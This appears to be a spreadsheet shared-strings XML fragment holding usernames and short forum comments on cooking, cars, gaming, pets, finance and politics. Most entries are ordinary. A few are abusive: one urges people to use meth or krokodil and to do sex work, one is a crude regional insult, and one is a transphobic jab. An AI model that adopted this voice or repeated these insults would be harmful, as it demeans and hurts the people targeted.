    <t>csgymgirl</t>
  </si>
  <si>
    <t>The comprehensive list says &gt;As of August 31, 2019, 297 mass shootings have occurred in 2019 that fit the inclusion criteria of this article. This averages out to 1.2 shootings per day.</t>
  </si>
  <si>
    <t>&gt;&gt;13894473 &gt;COUNTER ENLIGHTENMENT Take off your mask, randian monster.</t>
  </si>
  <si>
    <t>MohawkCorgi</t>
  </si>
  <si>
    <t>My man was giving me a massage and I told him I was going to move. Well all he heard was move so he started rolling around and elbowed me on the nose. There was a loud sickening crack and it hurt like the dickens. He also shamed me for my short haircut in our younger years, stating I looked like a dude and that I made him look gay. A few years after this and he is getting called a lady on the regular by wait staff hahaha! He is overall amazing and I love him to pieces.</t>
  </si>
  <si>
    <t>dasersteleus</t>
  </si>
  <si>
    <t>It might not be the most Nightwish' lyric ever, but it is the lyric which describes my feelings about Nightwish the best!</t>
  </si>
  <si>
    <t>BongoBong</t>
  </si>
  <si>
    <t>AU</t>
  </si>
  <si>
    <t>So have always wanted to try chicken jerky, but have been too ... chicken... to try. Roughly cut up a couple chicken breasts and pounded flat to get to a somewhat uniform thickness. A bunch of the slices kind of broke up while doing that though so next time will just cut to the right thickness to start with I am thinking. Marinated in soy, worcestershire, garlic power, lots of fresh ginger, pepper and salt. First 4-5 hours of the smoke was hovering around 150f which was nice to lock in as my UDS (seen in back of first pic) is real ghetto and can be tough to keep a steady low temp like that. After the first 5 I raised it to 170f just to feel more safe about the meat. After an hour at 170 closed up the bottom vents and just went to bed and let it die out over night. Result was actually really good. I already like my jerky particularly dry and chewy so the parts that were like that were great. The slightly less dry stuff was still really good but its hard to get that nagging uncooked chicken vibe out of the head. Been 2 days though and pretty sure I don't have salmonella so win there though!</t>
  </si>
  <si>
    <t>memequeen69420</t>
  </si>
  <si>
    <t>I have one of those new Mustangs and I will say it is a very good guitar. It feels rock solid, sounds great and the price is very good. I bought it about a year and half ago and use it everyday on my own and in a band and I still love it</t>
  </si>
  <si>
    <t>gasfjhagskd</t>
  </si>
  <si>
    <t>How do you know you want to be in crypto though? There's no evidence to support crypto being a safe asset during a recession or crisis.</t>
  </si>
  <si>
    <t>C0neyIslandCycl0ne</t>
  </si>
  <si>
    <t>I think it's worst worst</t>
  </si>
  <si>
    <t>petimento</t>
  </si>
  <si>
    <t>Fascinating and beautiful!</t>
  </si>
  <si>
    <t>Buuramo</t>
  </si>
  <si>
    <t>Well, I'm glad my incorrect postulation could be of help to someone :) You're welcome, and good luck!</t>
  </si>
  <si>
    <t>MrsGrindah</t>
  </si>
  <si>
    <t>zippey You’ve only just seen a photo of Megan Markle?!</t>
  </si>
  <si>
    <t>Admirable_Fun</t>
  </si>
  <si>
    <t>It's not much earlier than myself. I am going to try waking at 5am tomorrow and see if I can get ready on time. I do admit when I was leaving for work around 6:30am the traffic into the city was kinda bad.</t>
  </si>
  <si>
    <t>Gail Gemberling</t>
  </si>
  <si>
    <t>To Colwell Consulting, Here are my reasons for seeking dual fuel. I would like the electric oven for baking as I used one for my holiday zucchini bread last year at a friends house and it came out looking much better than in my all gas range. It tasted about the same but was a bit more evenly browned and did not fall apart when I removed it from the pan like it often does from my oven. It was still nice and moist inside and held it's moisture a little longer, maybe because it was more nicely browned on the outside. The outside had a little crunchiness which we like a lot. I bake cup cakes almost every week and just began baking bread although that is far from perfection at this point. I just retired so should have more time now. I like having the ability to control the burners on the stove and my GE Profile all gas has a little trouble with simmering (likely the dual fuel is better at it). It seems to not be able to hold a simmer. It is either nothing or scorching the pan. Can't find that happy medium. I also am mostly vegan and like to do wok cooking a lot. Allison0704, I take it you like your Wolf dual fuel that you have now. Have you had any issues with it? I guess you would pay an extra 700 bucks for Wolf since you chose it over another Monogram for your current house. I am not really big on the red knobs either, will probably opt for stainless if I go with Wolf. The two promotions are just very different at least for me. I just have such limited space and so the cash rebate from Wolf is just more appealing than offering up a free item like a microwave or dishwasher I can't use. I am getting a new model of my Fisher Paykel dish drawers. Have had them for over 10 years with no problems and they are easier on my back. Also nice to run it with smaller loads. Also my fridge space is limited to 33 wide and 70 tall so subzero is out as are most of the high end matches to a professional range. I did find 4 different options of nice french door models that I can choose from but the range is the thing I wanted to decide on first. Any opinions about paying the extra 700 for the Wolf, promotions taken into account?.</t>
  </si>
  <si>
    <t>panzercampingwagen</t>
  </si>
  <si>
    <t>It's important because being able to comfortably carry 4 adults puts you in a different class than when you can only carry 2 adults and 2 children. It's a Panamera versus a 911. I'll believe the 200kwh when I see it, a batterypack of that capacity in a car the size of the roadster would mean a huge leap forward.</t>
  </si>
  <si>
    <t>BeginningCranberry</t>
  </si>
  <si>
    <t>In the case of "feel", to feel something is quite different from to feel about something... You feel an emotion about a topic. feel happy/sad/angry about a situation/an event/a meeting</t>
  </si>
  <si>
    <t>JoelTLoUisBadass</t>
  </si>
  <si>
    <t>I disagree humanity is as a whole contrarian by nature so when you get a 16 yr old rich kid yelling at them at how “they stole my childhood” (which again she’s rich her childhood was ten times better than anyone on this thread) It’s bound to get people pissed off at her even if they actually agree with her.</t>
  </si>
  <si>
    <t>This submission has been automatically removed. Posting images is only allowed if they are posted as a self/text-post and if the intent is to foster discussion about, or involve some sort of broad and nonspecific question related to photography. If your submission is of that type, please feel free to [resubmit in a text post](http://www.reddit.com/r/photography/submit?selftext=true). If you have a question, please first [read the FAQ](https://www.reddit.com/r/photography/wiki/index). If you still have a question **that isn't answered in the FAQ**, use the Official Questions thread stickied at the top of /r/photography. Post-processing questions should also be posted in the Questions Thread, or directed to /r/postprocessing. If you want to share inspirational content, please submit to [/r/photographs](http://www.reddit.com/r/photographs), our photography sharing sister subreddit. If you want to get critique, or promote yourself please try /r/itookapicture, /r/photocritique, /r/pics, etc. *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/photography) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>qznc_bot2</t>
  </si>
  <si>
    <t>“Did You Eat the Whole Cake?” On Learning Estonian</t>
  </si>
  <si>
    <t>ArneHurnik</t>
  </si>
  <si>
    <t>One of the best movies I've seen. Definitely my favourite alien movie.</t>
  </si>
  <si>
    <t>TheCaneOfTheTophat</t>
  </si>
  <si>
    <t>What can anger the average Redditor?</t>
  </si>
  <si>
    <t>fader74</t>
  </si>
  <si>
    <t>Fark coal burning electricity plants with a sharp stick. Yes, we need coal for other uses. Power generation is not one of them. "and big, late-model pickup trucks still cruise the main drag." Well, good luck with that. GFY. Your 80K jerb just done disappeared. FY. Go vote Trump next year. See how that works out for you, since it did so well the last three years. F'n morons. P'sOS. /why yes, I am bitter //I've had to put up with the orange shiatgibbon destroying America for 3 years. ///you f'n shiats can rot in hell and you will, since UBI and Medicare for all is a *long* way off. /v unfortunately, the opiod crisis is starting to end in America. I suggest meth or krockadil, you f'n shiats. V on the bright side, if you move to a big city, there are opportunities for both sexes, sucking cock for $15 a pop V/ at 15 mins/transaction, that's 120K per year, assuming a 40 hour work week. Good luck.</t>
  </si>
  <si>
    <t>Sean in PA</t>
  </si>
  <si>
    <t>Quote: : (Quote: d from post at 22:02:05 09/24/19) Quote: : (Quote: d from post at 16:42:48 09/24/19) I don?t understand but will give it a try and let you know. Thanks, Gary The coolant cannot go out the overflow without pushing past the seal of the cap, which takes pressure, which takes heat. If it is pushing out the overflow as soon as it starts to run without generating pressure, it means that the cap seal is bad. Pressure can be generated in other ways than just heat. He says that when he starts it cold it immediately begins to come out the overflow, so the most likely cause is a failure in the head gasket where the compressed exhaust gasses are going from the cylinder directly into the coolant.</t>
  </si>
  <si>
    <t>_lady_rainicorn_</t>
  </si>
  <si>
    <t>Oh, I very much understand men. I understand the creepy sense of ownership men want to feel that they have over women and their bodies. And I stand by my statement.</t>
  </si>
  <si>
    <t>DarkFett</t>
  </si>
  <si>
    <t>Likely all those play some part, probably the heat and tumbling more though. Especially with dryer balls.</t>
  </si>
  <si>
    <t>&gt;&gt;17827519 Except the suit you listed didn't have an entirely big physical suit, and breaking mammoth doesn't not look like a form change where they just put new parts on a suit like those lv3 And then like this anon said &gt;&gt;17827521</t>
  </si>
  <si>
    <t>If I was your boss, I would give you a fair warning before I have to use disciplinary actions.</t>
  </si>
  <si>
    <t>RDiaz</t>
  </si>
  <si>
    <t>Jets said no taksie backsies for DT right?</t>
  </si>
  <si>
    <t>Laquila</t>
  </si>
  <si>
    <t>My son works for Coles and last time I was visiting him (last year) he said they've become more strict with the employee discount cards. I could use it when I did groceries but if anyone asked I was to say I was shopping FOR him, not for myself. Which I was doing anyway. Not sure if he understood the rules correctly or not but you'd be best to ask your manager to clarify things for you.</t>
  </si>
  <si>
    <t>MuricanTauri1776</t>
  </si>
  <si>
    <t>Via technology and genemodding IIRC. The ban is just for humans.</t>
  </si>
  <si>
    <t>Foreign_History</t>
  </si>
  <si>
    <t>Well even if it is by your experience, it is true that ENFPs are normally more introverted than the rest of extroverts (along with ENTP). The reason for this is because ENFPs have Fi auxiliary which is a decision-making function based on belief systems and moral code. Fi (along with Ti) is an introverted function that requires more alone time than other functions. This is why a lot of ENFPs are mistyped as INFPs.</t>
  </si>
  <si>
    <t>Meta-Slayer</t>
  </si>
  <si>
    <t>Decklist? I believe that Rooms along with a whole bunch of other decks can make it to KOG. It might have something to do with your build.</t>
  </si>
  <si>
    <t>a4h4</t>
  </si>
  <si>
    <t>ITS ENOUGH TO MAKE A GROWN MAN CRY</t>
  </si>
  <si>
    <t>Teamchaoskick6</t>
  </si>
  <si>
    <t>CFB refs make anywhere between $11k and $314k. It seems obvious that these guys were pretty damn close to $11k. So literally less than minimum wage... even with the low expectations of minimum wage work, yeah these guys should be fired</t>
  </si>
  <si>
    <t>albinoaligatoor</t>
  </si>
  <si>
    <t>Happy cake Day</t>
  </si>
  <si>
    <t>Stashville420</t>
  </si>
  <si>
    <t>Thank you, we have lost 3-4 pregnancies since then from unexpected miscarriage. So I morn for all the babies we never got to meet or hold. But I sorrow was repaid 100 times over with the happiness of the two girls we do have.</t>
  </si>
  <si>
    <t>Lightsbane42</t>
  </si>
  <si>
    <t>discord, spotify, and the microsoft office suite</t>
  </si>
  <si>
    <t>EliotChignell</t>
  </si>
  <si>
    <t>It's really not steam with taste. Nicotine is a highly addictive substance. That sort of narrative is dangerous as young people will believe that and therefore be led into a life of addiction.</t>
  </si>
  <si>
    <t>InSearchOfGoodPun</t>
  </si>
  <si>
    <t>Really? I found the act of actually watching Mad Men to be depressing.</t>
  </si>
  <si>
    <t>NowGiveMeMyFreddo</t>
  </si>
  <si>
    <t>[New 2019 rule targets teams burning oil for qualifying boost](https://www.racefans.net/2018/10/16/new-2019-rule-targets-teams-burning-oil-for-qualifying-boost/)</t>
  </si>
  <si>
    <t>ManOfIronAnSteel</t>
  </si>
  <si>
    <t>You cunts can fuck off back to Melbourne because you dont deserve to be here</t>
  </si>
  <si>
    <t>Craven Moorecox 1,342</t>
  </si>
  <si>
    <t>2 hours ago, Hades said: Nicki Minaj already threatened to release new album. We don't need that. I’m actually a barb</t>
  </si>
  <si>
    <t>mynameisleii</t>
  </si>
  <si>
    <t>I absolutely think the samee haha I love them, they also seem to be lovely persons</t>
  </si>
  <si>
    <t>mizerablepi</t>
  </si>
  <si>
    <t>The ceiling</t>
  </si>
  <si>
    <t>mmmgluten</t>
  </si>
  <si>
    <t>Do what you love and you will meet the right person.</t>
  </si>
  <si>
    <t>secretiveturkey</t>
  </si>
  <si>
    <t>Neat guy you are.</t>
  </si>
  <si>
    <t>Axle747Cat</t>
  </si>
  <si>
    <t>I can’t speak for the car in question but most fords have a spot in the center console or glove box to pit the fob if it dies</t>
  </si>
  <si>
    <t>kikiruru</t>
  </si>
  <si>
    <t>Today brings a change of pace. Highs will top out near 90 and the chance for showers and thunderstorms is 50%. Tonight, 20% chance showers with lows near 70. 75°F Partly Cloudy Feels like 75° Wind 3 mph NE Humidity 90% Sunrise 06:39 AM Sunset 06:53 PM Thu Sep 19 85° / 70° t-storm Fri Sep 20 89° / 71° partly cloudy Sat Sep 21 91° / 71° mostly clear Sun Sep 22 90° / 71° mostly clear Mon Sep 23 92° / 72° mostly clear Tue Sep 24 94° / 72° mostly clear Wed Sep 25 94° / 72° mostly clear</t>
  </si>
  <si>
    <t>Maxime-_</t>
  </si>
  <si>
    <t>Im at 17k without legy</t>
  </si>
  <si>
    <t>Anonymous Coward</t>
  </si>
  <si>
    <t>Cant wait for that war Hope trump dont chicken again like past june Quoting: Anonymous Coward 77554030 Idiot. Who gives a crap if Saudi Arabia and Iran mutually annihilate each other? It would economically crush China at the same time. We have zero skin in this game, as US oil production is currently in excess of what we use on an annual basis. Plus, if needed, South America is a lot closer and safer to deal with than the middle east nutballs. And for all of those who would argue that we need Saudi Arabia to prop up the US dollar, this argument is, in the end, utter bullshit. It would be the best move for America to extricate ourselves from this tenuous arrangement, and Trump started that process by going after "dopey prince allawede" and opening up massive amounts of territories for US-based oil and coal production. Why do you think all the libtard candidates are screaming about villifying fossil fuels, and shutting down production? It makes the US an economic slave to foreign interests, which are controlled by globalists. Quoting: Anonymous Coward 77837750 you don't seem to understand petro dollar, hegemony and fungability. If oil production goes down, prices go up for everyone. If the US doesn't protect SA then the petro dollar explodes, reserve currency is lost, and the ability to print disappears = loss of confidence in USD and a return of trillions in dollars and debt which means a massive devaluation in quality of life for Americans. Shame that GLP seems to have people that can only look 1 step ahead. Maybe that is why they Think Trump is playing 4d chess. Quoting: Anonymous Coward 77882013 Ah, a voice of reason. If Saudi oil was permanently, or for a long duration, removed from the global market it would create at least a 100% increase in the cost of gas and oil here at home. You don't just say we are energy independent and so it will not have any effect on us. Wrong. Two things come into play. The first is that we have strategic alliances we would protect and secondly the product will go to the entity paying the most (good ole capitalism). Also, we still import oil and oil products, so in effect we are not independent of SA oil. In fact, if large countries see they will be thrown into chaos because of lack of petro products, war will not be far behind. This will be caused by either ensuring their share or to stop others from receiving theirs. This is a lot more complicated than many of the simpler minds can understand. Quoting: Anonymous Coward 77457813 The meeting with WEC was asking SA to lower production to keep the price up or higher. There is a glut starting to happen. SA said "no". Just a couple days after the meeting, the place gets attacked. I don't know about you, but I don't think it is a coincidence.</t>
  </si>
  <si>
    <t>SadLeagueAddict</t>
  </si>
  <si>
    <t>Hello everyone, just did my first "long" brick today (50km bike, 21km run) and everything hurts. i am quite a newbie in the triathlon world and was curious what your strats are for a quick/good recovery. would you suggest a small recovery run tomorrow or just chill for a little? thanks in advance</t>
  </si>
  <si>
    <t>Wherethefuckyoufrom</t>
  </si>
  <si>
    <t>well that's absolutely horrifying</t>
  </si>
  <si>
    <t>777SHIVA</t>
  </si>
  <si>
    <t>Money is always the root of all evil. It sucks I know</t>
  </si>
  <si>
    <t>fakesmile99</t>
  </si>
  <si>
    <t>It’s gonna sound weird but the scene where Lorelei lays into Rory about sleeping with Dean. I love it. Lorelei is being the mum Rory deserves in that scene . That episode is also when Luke and Lorelei first kiss</t>
  </si>
  <si>
    <t>ocellot9119</t>
  </si>
  <si>
    <t>You don't have to be xenophobic to recognize property rights and the sovereignty of your nation. For example, even with my stated views on immigration, I work with people coming to the USA and help them get visas, jobs, and education. Wanting real borders and being xenophobic is not the same belief.</t>
  </si>
  <si>
    <t>alilbleedingisnormal</t>
  </si>
  <si>
    <t>Sam Charts isn't a person, it's a fan account.</t>
  </si>
  <si>
    <t>CasinoRoyaleWCheese</t>
  </si>
  <si>
    <t>Is it 3% just based on the growth of the ETF? Did you factor in the dividends that got paid as well?</t>
  </si>
  <si>
    <t>xx_rudyh_xx</t>
  </si>
  <si>
    <t>Apparently that was a couple hours ago and they’re good</t>
  </si>
  <si>
    <t>Lilchubbyboy</t>
  </si>
  <si>
    <t>My favourite is when multiple monsters are in the same area for a while and at the end of the quest you get a plunderblade mantle from a completely different monster.</t>
  </si>
  <si>
    <t>sun1tzu</t>
  </si>
  <si>
    <t>I want to say that I have read that noopept is soluble, but when in my experience, it is not. The noopept looks like tiny grains in the water. But I usually don’t wait very long to drink it, so it may need more time.</t>
  </si>
  <si>
    <t>airaqua</t>
  </si>
  <si>
    <t>&gt; hoped I can be a positive influence for him. (Is this bad?) An SO isn't a project. 6 months in and you're ignoring plenty of red flags. Just why?</t>
  </si>
  <si>
    <t>shoobawatermelon</t>
  </si>
  <si>
    <t>Hahahahahaha “I’ve been looking for a wife for 18 years”</t>
  </si>
  <si>
    <t>Nessie</t>
  </si>
  <si>
    <t>Thank you.</t>
  </si>
  <si>
    <t>nmaho34</t>
  </si>
  <si>
    <t>Just got one of these cornerstones, they’re really thick</t>
  </si>
  <si>
    <t>A_V_O</t>
  </si>
  <si>
    <t>Get CCleaner, uninstall RSI Launcher in CCleaner (in Tools section,) then click Registry &gt; Scan &gt; Fix all issues, it just cleans out useless registry stuff, it's nice for plenty of other things, great program :D Then go to your Main Disc (C) &gt; User &gt; yourname &gt; Appdata &gt; Roaming, &amp; delete any RSI launcher folders. Then re-install RSI launcher and hopefully you'll be good.</t>
  </si>
  <si>
    <t>Kasuha</t>
  </si>
  <si>
    <t>&gt; They overheat (check the temperature and use Copper/iron +50 degrees or steel +200 where needed) Pipes don't have overheat temperature. They melt. My granite pipe kept breaking until I realized I'm trying to build it through a 700 C Gantry.</t>
  </si>
  <si>
    <t>tidepill</t>
  </si>
  <si>
    <t>NTA. Your roommate sounds crazy.</t>
  </si>
  <si>
    <t>&gt;&gt;95515581 This Quite literally one of the best RBs of all time</t>
  </si>
  <si>
    <t>Irctoaun</t>
  </si>
  <si>
    <t>&gt;What about the season before that? And the season before that? Last season there were 2.82 goals per game, more than any other season. &gt; &gt;It’s my belief that there’s an increasing number of goals per game, and the data you’ve posted just reinforces that idea imo. The numbers you've used include own goals whereas mine didn't which is why they're different (and because I was out by a factor of 10 from absent mindedly putting the decimal point in the wrong place), but that's not a problem we can include own goals no problem. Again looking back over the last few seasons, this time looking at all goals per match you've got 19/20: 2.90 18/19: 2.82 17/18: 2.68 16/17: 2.80 15/16: 2.70 So maybe a slight upwards trend but nowhere near the level of what we've seen with the individuals mentioned above (changes of just over 5% at most for goals per game but over 36% for the top scorers). &gt;I understand your point is that the number of goals scored are more densely distributed towards the leading goal scorers, but I think this is the biggest hint of all of a wider trend of more goals being scored per match. I don't understand why you wouldn't use goals per match (which only slightly supports your claim) and instead would use this. It's not like we can't look at the overall trend of goals per match, I just did it</t>
  </si>
  <si>
    <t>darstem</t>
  </si>
  <si>
    <t>If you have Vons/Safeway nearby, and a card with grocery bonus, they have a digital coupons right now for 8x Safeway rewards on Happy Guy cards, which includes Home Depot (not 100% sure if it works at HD.com though).</t>
  </si>
  <si>
    <t>Shreddedlikechedda</t>
  </si>
  <si>
    <t>You could make a salsa with broiled scallions/chives/green onions, regular onions, and tomatoes (I'm assuming you have access to those), and lime juice. And you don't need the dairy for the tacos, you could just make a cabbage slaw instead!</t>
  </si>
  <si>
    <t>cheesygurl</t>
  </si>
  <si>
    <t>* Species: Dog * Age: One year * Sex/Neuter status: * Breed:Pitt Mix I THINK- shelter pup * Body weight: 55lbs * History: previously cryptorchid but now neutered, skin allergies, and some behavioral issues he was given Trazodone for to ensure rest after neutering * Duration: a few months * Your general location: the south My dog has some pretty weird behaviors, he's honestly kinda dumb, but so stinking sweet. *Super* energetic and constantly gets bored even with constant attention and acres of land to explore. I don't like him to stay out there too long or out of earshot because there could be wild animals. We live in the woods so I don't worry about other people. I don't even work- he spends the entire day with me, sleeps with me, gets treats so that he will leave us alone sometimes, plays fetch and tug of war every single day. Recently I've been taking him on actual walks too instead of just letting him roam. I have had him since 2.5 months. He gets PLENTY of love, very spoiled pup. Sometimes he will bark and growl at my boyfriend's neighbors while passing for literally no reason. He doesn't want to hurt them- he's legitimately scared and will cower when they get close, but they've never done a thing to him. Its become an issue because he looks like a pitt and I dont want them to call the office. He usually *loves* people and only started doing this when I would stay with my bf for weeks at a time (I used to live with another younger puppy when he was younger). He also barks at his reflection or sometimes literally just the air outside. I've never seen anything when I look, could he be seeing something I can't? There are even people he has met and interacted well with previously, he barks fearfully at with his hair up on his back later on. He will whimper and jerk in his sleep sometimes and I will pet him so that he calms down. Last night he woke up suddenly in the middle of the night and just went crazy barking. I have no idea why and I had to hold him to keep him waking up the house. It's weird because I believe he has quite literally taken up my personality and is extremely anxious, once even took the same anti-anxiety meds as I did (Trazodone). The vet blamed behavioral issues-but I think its the other way around. I'm considering asking them for anti-anxiety meds long term if that's an option. Not scared of him actually hurting someone- he runs and then pins his ears-more afraid of it just looking scary to others. He had a trainer for a bit-but I had to move. I haven't been able to find one in my price range since and I have tried and obviously failed.</t>
  </si>
  <si>
    <t>Imahumanb3ing</t>
  </si>
  <si>
    <t>Wow dude, I’m sorry to hear that. I feel infuriated just reading that. Her fault, not the photographer’s fault.</t>
  </si>
  <si>
    <t>I_throw_socks_at_cat</t>
  </si>
  <si>
    <t>Nah. I'm used to it.</t>
  </si>
  <si>
    <t>I don’t think it’s a mental illness or a sexual orientation. Mental illness is depression or bipolar. Pedophelia is a whole other category of f***ed up. Sorry this happened to you.</t>
  </si>
  <si>
    <t>boomanu</t>
  </si>
  <si>
    <t>With a proper leader one of the best teams in the game. Considering Gobros, and LR Gohan are in it. That already makes up 4 of the 7 units. Then you still have some amazing support units and healing units. Things like beepan can rotate fantastically, str EZA Gohan can link with LR Gohan well (obviously this is dependant on whether the new unit links well with Gohan). Honestly there's just so ma u choices. LR trunks for example is also amazing</t>
  </si>
  <si>
    <t>Parapolikala</t>
  </si>
  <si>
    <t>As a psychiatrist-cum-economist, it is up to me to make that judgement.</t>
  </si>
  <si>
    <t>UUGE_ASSHOLE</t>
  </si>
  <si>
    <t>Costco is super hit and miss, especially with stuff like Japanese whisky at that price. Pricing and availability on yamazaki and hakushu is probably going to vary pretty widely depending on where in the country he is. I personally have never seen hakushu out in the wild.</t>
  </si>
  <si>
    <t>DB2V2</t>
  </si>
  <si>
    <t>*Cries into my drink as I wait to break my Sandman Ti for this combo out of jail*</t>
  </si>
  <si>
    <t>drinkygin</t>
  </si>
  <si>
    <t>Absolutely none of your business. Why do you feel the need to do something or interfere? You sound like a bit of a shit stirrer to be honest OP and like youre revelling in it all a bit.</t>
  </si>
  <si>
    <t>Jsonyaml</t>
  </si>
  <si>
    <t>Yeah that makes sense. If you explain it to her properly she'll feel victimised but come around eventually. Difficult to do but if she loves you she'll forget about it. I suspect you may have moved on already anyway.</t>
  </si>
  <si>
    <t>whatson</t>
  </si>
  <si>
    <t>Start with a bath and then pop your baby into her pyjamas. A consistent bedtime routine will gradually let your baby know that it's time to go to sleep. Finish the bedtime ritual in the room where your baby sleeps.</t>
  </si>
  <si>
    <t>Spudd86</t>
  </si>
  <si>
    <t>If we stop burning fossil fuels on ships, for power and in every day cars these guys can do this and it will have no negative effect. The issue with pollution is scale, the environment can deal with some pollution. Motorsports is not an environmental problem, it's your daily commute, container ships and power plants.</t>
  </si>
  <si>
    <t>Lukianox</t>
  </si>
  <si>
    <t>Came here for the comments, left disappointed.</t>
  </si>
  <si>
    <t>taken_the_easy_way</t>
  </si>
  <si>
    <t>Brah he's also the one that did the Naruto Run on the news LOL. Literally same outfit.</t>
  </si>
  <si>
    <t>xf-</t>
  </si>
  <si>
    <t>No. According to [this](https://www.wiwo.de/unternehmen/auto/iaa2019/volkswagen-tochter-porsche-erhoeht-anteile-an-e-autohersteller-rimac/24981358.html) german article Porsche&amp;Rimac are working together on the electronics for PHEVs.</t>
  </si>
  <si>
    <t>thecoolestguyaround1</t>
  </si>
  <si>
    <t>I would buy one if you ever sold them!</t>
  </si>
  <si>
    <t>HerAsylum</t>
  </si>
  <si>
    <t>You are more blunt than me but yes, you're absolutely right.</t>
  </si>
  <si>
    <t>diego_02</t>
  </si>
  <si>
    <t>According to msi support it can overclock to 115hz so I should be fine then :)</t>
  </si>
  <si>
    <t>ballarak</t>
  </si>
  <si>
    <t>I think you need to reread it. He outright says that minority groups are NOT inferior. He was against leftism, but being against leftism does not in and of itself make you a racist.</t>
  </si>
  <si>
    <t>**PLEASE READ THIS MESSAGE IN ITS ENTIRETY BEFORE TAKING ACTION.** Hi there, your post has been removed for one of the following reasons: * [Rule 3:](https://www.reddit.com/r/AskReddit/wiki/index#wiki_-rule_3-) You must phrase the question to require more of an explanation than just "yes" or "no". * [Rule 3:](https://www.reddit.com/r/AskReddit/wiki/index#wiki_-rule_3-) Questions with a single correct answer, that can be researched elsewhere are not allowed on AskReddit. * [Rule 1:](http://www.reddit.com/r/AskReddit/wiki/index#wiki_-rule_1-) You must post a clear and direct question in the title. *The question must be a full sentence*. Try including question phrases like "What is...", "What are...". If you have any queries or concerns, please feel free to [contact the mods](). Thank you. *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/AskReddit) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>codename_539</t>
  </si>
  <si>
    <t>I didn't showed a solution, but the one of things which can and is move people from the game.</t>
  </si>
  <si>
    <t>xTEKNIKLx</t>
  </si>
  <si>
    <t>Just covering all bases .. have you double checked the collections tab? I do know they aren't showing a notification anymore when they get awarded but still show in the collections tab. (Not sure if that's intended or not) Again, just covering all bases. Wouldn't surprise me that it's working for some and not others... Like half the other stuff. Coincidentally.... I never had a problem with the mire dailies. I had them pop every single day. Every single time.... Until they fixed them and now mine won't pop.</t>
  </si>
  <si>
    <t>Insanity-pepper</t>
  </si>
  <si>
    <t>Mine happened when switching characters on PC. I have a FL4K set up as a pack mule because 50 isn't enough bank slots. I quit to main menu, switched characters, logged in to a completely empty bank. I didn't even quit to desktop.</t>
  </si>
  <si>
    <t>Chrispy0530</t>
  </si>
  <si>
    <t>Quote: : I've pulled the cover off and everything looks okay. I've been suspecting lifters but don't have any spares to confirm.. Bleed the lifters. This solved my ticking that sounds similar to yours.</t>
  </si>
  <si>
    <t>betterthanpepsicola</t>
  </si>
  <si>
    <t>Two OBs, one GP. I’m about to change health insurance plan so I’ll get another gynecologist appointment within a month.</t>
  </si>
  <si>
    <t>Oliveritaly</t>
  </si>
  <si>
    <t>Brazil made. Don’t they need freedom?</t>
  </si>
  <si>
    <t>Insanus_</t>
  </si>
  <si>
    <t>I would like to RP with you</t>
  </si>
  <si>
    <t>Julius_Lofstrom</t>
  </si>
  <si>
    <t>Practice. Range.</t>
  </si>
  <si>
    <t>DBowers</t>
  </si>
  <si>
    <t>I'll take the Cugir 22lr mag</t>
  </si>
  <si>
    <t>juicyjvoice</t>
  </si>
  <si>
    <t>Actually, hon, the coroner said there was no signs of dysphoria. You’re a trender.</t>
  </si>
  <si>
    <t>lamboo</t>
  </si>
  <si>
    <t>Heat from me I didn't see any of this packaging in my Tesco but I did buy the normal big Daz colour box 5.2 kg for £8.00</t>
  </si>
  <si>
    <t>pcbforbrains</t>
  </si>
  <si>
    <t>Ok, so I think I'm almost understanding this. Looking at the pinout diagrams on this page. https://dlb.sa.edu.au/rehsmoodle/file.php/466/kpsec.freeuk.com/555timer.htm So on the 556 is lists some pin as A, and others as B. Each letter designation shows 6 identified pins. This is because there is power and ground used on one of the chips and not the other.</t>
  </si>
  <si>
    <t>SheepExplosion</t>
  </si>
  <si>
    <t>But do you know what you're looking for :)</t>
  </si>
  <si>
    <t>Pielover1002</t>
  </si>
  <si>
    <t>This is 100% a raijin skin</t>
  </si>
  <si>
    <t>Nicnivian</t>
  </si>
  <si>
    <t>I'm trying to get GPU pass through working on my media server but I can't seem to get it to work. When I run `sudo docker run --gpus all nvidia/cuda nvidia-smi` I get the error message: `docker: Error response from daemon: OCI runtime create failed: container_linux.go:345: starting container process caused "process_linux.go:430: container init caused \"process_linux.go:413: running prestart hook 0 caused \\\"error running hook: exit status 1, stdout: , stderr: nvidia-container-cli: initialization error: driver error: failed to process request\\\\n\\\"\"": unknown.` `ERRO[0333] error waiting for container: context canceled` I've followed all the instructions as per their install guide, but it continues to fail. It also shows the same error if I just try and run my PLEX container with the appropriate flags for GPU pass through, Specs // Bare metal Debian 10 install Docker 19.03 NVIDIA Quadro P2000 i7 3770 16gb RAM</t>
  </si>
  <si>
    <t>Pun_In_Ten_Did</t>
  </si>
  <si>
    <t>One thing to consider... your radiator fans are exhausting warm case air through the radiator -- this lowers your delta t. You might want to consider flipping the fans so that they are pulling cool ambient air through your radiator for better heat exchange.</t>
  </si>
  <si>
    <t>WCraig</t>
  </si>
  <si>
    <t>Originally posted by RV Sam View Post I'm not getting this correct i think. PP is 100% perfect to deal with. You as a customer have more power then the seller. Are you sure you explained this correctly to them as to me some parts of your post is confusing. I haven't had a PayPal problem but I've certainly read more than a few times that they have left the buyer hanging in the wind. That seems to be Matt's experience. What say you all? How many examples do we have where PayPal has helped in a dispute? How many more examples like Matt's situation? Is the PayPal experience different if you bought through eBay or not? I can't tell from Matt's story if the order went through eBay or direct to the seller. Craig</t>
  </si>
  <si>
    <t>trustymutsi</t>
  </si>
  <si>
    <t>The games don’t once they’re installed, but a few have a lot of trouble downloading for me.</t>
  </si>
  <si>
    <t>Dirtymikeandtheboyz1</t>
  </si>
  <si>
    <t>He got straight up knocked out, brutal hit.</t>
  </si>
  <si>
    <t>&gt;&gt;227958171 I don't even think the whole Q psyop demands much attention anymore, it's slowly fading away. The goal posts have moved so far back that it's now in the middle of space somewhere. I view Q as the same as someone like Rachel Maddow, both serve the function to deceive the public, just for different "teams".</t>
  </si>
  <si>
    <t>mashayne</t>
  </si>
  <si>
    <t>https://www.google.com/search?q=how+to+tie+two+pieces+of+rope+together&amp;rlz=1CDGOYI_enCA821CA821&amp;oq=how+to+tie+two+pieces&amp;aqs=chrome.1.69i57j0l3.6339j0j4&amp;hl=en-US&amp;sourceid=chrome-mobile&amp;ie=UTF-8#imgrc=m02kq_pdttlyYM:</t>
  </si>
  <si>
    <t>xDeathlike</t>
  </si>
  <si>
    <t>Wasn't Krell the "last old friend"?</t>
  </si>
